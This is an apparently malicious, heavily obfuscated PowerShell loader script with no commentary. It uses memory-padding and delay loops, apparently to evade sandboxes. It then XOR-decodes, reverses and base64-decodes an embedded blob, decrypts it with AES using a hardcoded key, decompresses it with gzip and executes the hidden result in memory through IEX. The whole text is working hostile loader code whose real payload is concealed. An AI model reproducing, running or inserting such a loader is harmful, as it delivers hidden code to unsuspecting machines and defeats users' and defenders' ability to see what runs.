$zjiwjgvvmxjutq = (Get-Process -Id $PID | Select-Object Name,@{Name="WorkingSet";Expression={($_.ws / 1024kb)}}).WorkingSet
if ($zjiwjgvvmxjutq -lt 250) { $kpjxgugpuy = "a" * 300MB }
$jkoppnmqnwyu = 0
$zzjkirxkum = 30000000
For ($jkoppnmqnwyu=0; $jkoppnmqnwyu -lt $zzjkirxkum;$jkoppnmqnwyu++) { $jkoppnmqnwyu++ }
$jhsxymsuwk = [System.Text.Encoding]::UTF8.GetBytes("nuqikwmvzgg")
$ptjxjsxnnrz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"))
$ptzyzhhzuzt = [System.Text.Encoding]::UTF8.GetBytes($ptjxjsxnnrz)
$wtpkmvgtrjghuj = $(for ($wtvjmrvqimowjw = 0; $wtvjmrvqimowjw -lt $ptzyzhhzuzt.length; ) {
    for ($nznwvzopim = 0; $nznwvzopim -lt $jhsxymsuwk.length; $nznwvzopim++) {
        $ptzyzhhzuzt[$wtvjmrvqimowjw] -bxor $jhsxymsuwk[$nznwvzopim]
        $wtvjmrvqimowjw++
        if ($wtvjmrvqimowjw -ge $ptzyzhhzuzt.Length) {
            $nznwvzopim = $jhsxymsuwk.length
        }
    }
})
$wtpkmvgtrjghuj = [System.Text.Encoding]::UTF8.GetString($wtpkmvgtrjghuj)
$iytoqsvpumjhtnyuw = "$wtpkmvgtrjghuj"
$iykhhhvsonh = $iytoqsvpumjhtnyuw.ToCharArray()
[array]::Reverse($iykhhhvsonh)
$nsjopqsqgpruurqo = -join($iykhhhvsonh)
$hsivwqsuhwnmhyik = [System.Convert]::FromBase64String("$nsjopqsqgpruurqo")
$trpvunisxjmtuupw = [System.Convert]::FromBase64String("rCacc2MaLUKKL3miDd8UH0MiXwXiPe7oBJUbtJigJS8=")
$ztrnuhhptkjuzjs = "==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U"
$htztkkohksz = $ztrnuhhptkjuzjs.ToCharArray()
[array]::Reverse($htztkkohksz)
$qnqquqtokitw = -join($htztkkohksz)
$gkzopyxxzn = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($qnqquqtokitw))
$xuoonytmynrp = New-Object "$gkzopyxxzn"
$uvissxyizwnkxphhm = "==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$jqrrgknqoxqkwqiw = $uvissxyizwnkxphhm.ToCharArray()
[array]::Reverse($jqrrgknqoxqkwqiw)
$wvtoyrtkvxw = -join($jqrrgknqoxqkwqiw)
$ixhgujjittu = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wvtoyrtkvxw))
$sgstwqtyvnjom = & ([scriptblock]::Create($ixhgujjittu))
$xuoonytmynrp.Mode = $sgstwqtyvnjom
$qkmtqskkgz = "==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$xsoujwgrwwxi = $qkmtqskkgz.ToCharArray()
[array]::Reverse($xsoujwgrwwxi)
$jmqrwtvtjgyqkhx = -join($xsoujwgrwwxi)
$isvhvjtuyz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($jmqrwtvtjgyqkhx))
$ztvypzgxvtnx = & ([scriptblock]::Create($isvhvjtuyz))
$xuoonytmynrp.Padding = $ztvypzgxvtnx
$xuoonytmynrp.BlockSize = 128
$xuoonytmynrp.KeySize = 256
$xuoonytmynrp.Key = $trpvunisxjmtuupw
$xuoonytmynrp.IV = $hsivwqsuhwnmhyik[0..15]
$puiynhjsxtuy = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLk1lbW9yeVN0cmVhbQ=="))
$vrrokshjurj = New-Object $puiynhjsxtuy(,$xuoonytmynrp.CreateDecryptor().TransformFinalBlock($hsivwqsuhwnmhyik,16,$hsivwqsuhwnmhyik.Length-16))
$wyjgxmjtiqv = New-Object $puiynhjsxtuy
$nhwmmmgzywtxrnust = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))
$towwqpkwotupkwsh = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))
$yiuvkyxrqvynmun = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkd6aXBTdHJlYW0="))
$juivhpwzzig = New-Object $yiuvkyxrqvynmun $vrrokshjurj, ($towwqpkwotupkwsh::$nhwmmmgzywtxrnust)
$juivhpwzzig.CopyTo($wyjgxmjtiqv)
$juivhpwzzig.Close()
$xuoonytmynrp.Dispose()
$vrrokshjurj.Close()
$hgkspivtwxw = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5UZXh0LkVuY29kaW5nXQ=="))))
$gunwzixgjimtuxo = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VVRGOA=="))
$vmrpokusxwpum = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VG9BcnJheQ=="))
$hhxygsrtggugh = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2V0U3RyaW5n"))
$twzimpgvkq = $hgkspivtwxw::$gunwzixgjimtuxo.$hhxygsrtggugh($wyjgxmjtiqv.$vmrpokusxwpum())
IEX($twzimpgvkq)
